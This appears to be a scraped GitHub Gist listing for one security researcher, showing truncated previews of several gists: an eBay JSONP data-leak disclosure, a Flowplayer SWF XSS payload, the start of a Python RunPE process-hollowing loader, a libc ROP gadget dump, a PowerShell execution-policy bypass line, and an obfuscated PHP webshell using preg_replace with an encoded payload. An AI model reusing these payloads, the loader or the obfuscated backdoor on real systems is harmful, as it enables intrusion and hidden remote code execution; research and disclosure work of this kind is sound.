Toufik Airane toufik-airane
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell.exe -ExecutionPolicy Bypass "Stop-Process -name ConnectedAgent" | |
| #C:\Users\XXXX\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup |
toufik-airane
/ Ebay.JSONP-Inclusion.html
Last active
March 14, 2016 00:44
Ebay JSONP Inclusion Responsible Disclosure
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- | |
| 1 * Connect to Ebay | |
| 2 * Execute this snippet | |
| 3 * leak personal informations | |
| UPDATE 14/03/2016: Bug fixed | |
| Thank you for joined eBay Security Researchers Hall Of Fame | |
| http://ebay.com/securitycenter/ResearchersAcknowledgement.html | |
| --> | |
| <script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| flowplayer-3.2.6.swf?config={'log':{'level':'info'},'playlist':['\\\"))}catch(e){};alert(location.hostname);//']} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import pefile | |
| from ctypes import * | |
| from winappdbg import * | |
| CREATE_SUSPENDED = 0x4 | |
| def RunPE(): | |
| gFile, eFile = sys.argv[1], sys.argv[2] | |
| hHandle = win32.kernel32.CreateProcess(gFile, dwCreationFlags=CREATE_SUSPENDED) |
toufik-airane
/ XORStrings.c
Created
December 17, 2015 14:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| 2013/03/08 | |
| XORStrings V0.0.1, look for XOR, ROL or SHIFT encoded strings in a file | |
| Source code put in public domain by Didier Stevens, no Copyright | |
| https://DidierStevens.com | |
| Use at your own risk | |
| Shortcommings, or todo's ;-) | |
| - file must fit in memory | |
| - unicode support |
toufik-airane
/ blob.py
Created
December 18, 2015 10:44
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import bz2 | |
| def blob_encode(blob): | |
| a=bz2.compress(blob).encode('base64').replace('\n', '') | |
| return a | |
| def blob_decode(blob): |
toufik-airane
/ libc.so.6.gadget.txt
Last active
January 3, 2017 14:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Linux kali 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux | |
| /lib/x86_64-linux-gnu/libc.so.6 | |
| Gadgets information | |
| ============================================================ | |
| 0x000000000016b111 : adc ah, bh ; call qword ptr [rax] | |
| 0x000000000016b131 : adc ah, bh ; jmp rax | |
| 0x000000000016b0f1 : adc ah, bh ; push qword ptr [rax] ; adc bh, ah ; call qword ptr [rax] | |
| 0x000000000011eabf : adc al, 0 ; add byte ptr [rax - 0x7d], cl ; ret 0x4910 | |
| 0x000000000011eb29 : adc al, 0 ; add byte ptr [rax - 0x7d], cl ; ret 0xe910 | |
| 0x00000000000d2b1a : adc al, 0 ; add byte ptr [rax], al ; add dword ptr [rbp + 7], esi ; ret |
toufik-airane
/ get_defined_functions()
Created
January 20, 2016 14:30
PHP 5.6.14-0+deb8u1 get_defined_functions()
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Array | |
| ( | |
| [internal] => Array | |
| ( | |
| [0] => zend_version | |
| [1] => func_num_args | |
| [2] => func_get_arg | |
| [3] => func_get_args | |
| [4] => strlen | |
| [5] => strcmp |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -----BEGIN PGP SIGNED MESSAGE----- | |
| Hash: SHA1 | |
| Version: OpNasaDrones | |
| pub 4096R/4AAE63E0 2015-10-01 | |
| Key fingerprint = DEFD 83DD 81B5 A61D 9959 C009 4CFF 6773 4AAE 63E0 | |
| uid AnonSec (Nihil Verum Est Omnia Licita) <[email protected]> | |
| .8. b. 8 ,o888888o. b. 8 d888888o. 8 8888888888 ,o888888o. | |
| .888. 888o. 8 . 8888 `88. 888o. 8 .`8888:' `88. 8 8888 8888 `88. |
toufik-airane
/ gist:7242d91501a773fe8ac6
Last active
February 7, 2016 22:21
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php /* Mr-GanDrunX - Hiddenymouz - HiddenCode */ error_reporting(0); | |
| define('__LOCALFILE__',__FILE__); goto HIDDEN; function gandrunx(){ | |
| preg_replace("/.*/e",strrev("\x3B\x29\x29\x29'=Qw/dj4BnYYREB+hSn2rtfv/2eTcUgX2kakAWg2aBas8w7oXgCRf65IDBAPCeLaeeX3gb2Z7gIQ4PidB8QiqAdiUKowZUzmsRgLVzNFB/rOAc5W2EiQD855HyBaDhmIvLRiPuNw/sDQnZAPguQJdnVBBxHaruKQjjAh/F1nFymBGUeA6HfUfT81lwDNyCL6cD3W6hEaBdHP3a6GZpl/AxZDXl1QSDCSD6ZnDL5ZLqxW6nWdw2Mw4Lb66H0LYzay95AjCB47BH0FjeMucmZt3tTG2emGIbux4PuXlJPbpNZ/IZWDcuJH+Nm72TmmpqwkcCXqHuz7MIfTKOX5Z35tzWu7K/xr6T11QkOIZmppbr+OEFnXJr1We2Rn/bq8od/F/kPLpbyf16R1YynVr4hhuV4WwNn7sl0sn8e7uVi7ecz/PRNQXnYeUa8ql978H5NMD1kdo7RObJhxMBhw+OSSl9+eMJvp4l85kn9EJYSw287dLE3hZWs2CNcBGrRdNynGTHSUtzh5jfxUaF5zMfGOntcrZBwqbWMFMNsmwRVPUeoun9Ad8zwr0tBfULO57GXqztJ7tZZCzx/+k2c9JPnuueoh3vdxKiA1HBy+jjn0pyYSn+6Vs1HYXwoLwVaKl36Wc2zArv5KDs99yTexwEustByI0dqS3Jac2XSCcPn0mQGlgcwpnc/b+7yaVC0ZJMY9GbdbwkH/v9a5u/ezWtKNhjPuToSime2MfFlr7JZ0Ol3x+MbZOWCEMwedBUunqsnrzvCqkknzPqAl1reU1PO3CCzv1CA6HdwOGfr1nADmc+xUOT72fgQTMeTDDzZwcCqmY/6ofz35 |